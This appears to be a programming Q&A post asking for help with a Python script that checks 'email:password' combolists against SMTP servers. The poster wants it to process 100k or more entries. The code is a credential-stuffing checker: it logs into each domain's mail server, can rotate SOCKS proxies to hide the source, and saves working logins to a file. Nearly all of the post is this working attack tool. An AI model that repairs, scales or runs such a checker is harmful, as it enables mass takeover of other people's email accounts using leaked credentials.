# Python SMTP Authenticate email:pass via combolist in txt - Error need to Fi

Tags: python

It only works if I have one `user@domain.com:password` line in accounts.txt
but as soon as i add more than one `email:password` lines it gives error, e.g

```
user1@first.com:password
user2@second.com:password
user3@third.com:password
user4@fourth.com:password
```

all gives error even if the emails are good or bad, so it's not authenticating.

If it's one line alone it authenticates / connects and tell if the email is good or bad

```
user1@first.com:password
```

It's only accurate to first line if only one combo is there but gives error to all as soon as I edit the txt and add more lines of combos

i want it to be able to connect and give `connect` or `notconnect` to more than one combolist up to 100k and more, guess there should be an array in the smtp server

Here's my code:

```
import smtplib
import socks
import codecs
import unicodedata
import random
from multiprocessing.pool import ThreadPool

# PROXY_TYPE_HTTP
# PROXY_TYPE_SOCKS5

proxy_type = socks.PROXY_TYPE_SOCKS5    
use_proxies = False
thead_count = 1
use_encrpytion = False

accounts = []
accounts_checked = 0
accounts_valid = []
accounts_invalid = []

proxies = []

def check_account(email, password):
    try:   
        if (use_proxies):
            proxy = random.choice(proxies)
            proxy_host = proxy.split(':')[0]
            proxy_port = int(proxy.split(':')[1])

            socks.setdefaultproxy(proxy_type, proxy_host, proxy_port)
            socks.wrapmodule(smtplib)

        mailserver = smtplib.SMTP("mail." + email[email.index('@') + 1 : ],587)
        mailserver.ehlo()
        if (use_encrpytion):
            mailserver.starttls()
        mailserver.login(str(email), str(password))
        mailserver.quit()

        return True
    except smtplib.SMTPAuthenticationError:
        return False

def get_status(account):
    global accounts_checked, accounts

    if (':' not in account):
        return False

    email = account.split(':')[0]
    password = account.split(':')[1]
    
    valid = check_account(email, password)

    if (valid):
        print("Valid: ", account)
        f1 = open("connect.txt", "a+")
        f1.write(account)
        f1.close()
        accounts_valid.append(account)
    else:
        f2 = open("not_connect.txt", "a+")
        f2.write(account)
        f2.close()
        accounts_invalid.append(account)

    accounts_checked += 1

    print("(" + str(accounts_checked) + "/" + str(len(accounts)) + ")")

    return valid

if __name__ == "__main__":

    if (use_proxies):
        print("Reading \"proxies.txt\"...")

        with open("proxies.txt") as f:
            for line in f:
                if (':' in line):
                    proxies.append(line)

        print("Found " + str(len(proxies)) + " proxies.")

    print("Reading \"accounts.txt\"...")

    with codecs.open("accounts.txt", encoding='utf-8') as f:
        for line in f:
            line = unicodedata.normalize('NFKD', line).encode('ascii','ignore').decode('ascii')
            if (':' in line):
                accounts.append(line.replace("\n", "").replace("\t", ""))

    print("Found " + str(len(accounts)) + " accounts.")

    print("Creating thread pool...")

    pool = ThreadPool(thead_count)
    results = pool.map(get_status, accounts)
    pool.close()
    pool.join() 

    print("Done checking, writing output...")

    print("Completed!")
```

Comment: help with this code thanks @Michael M.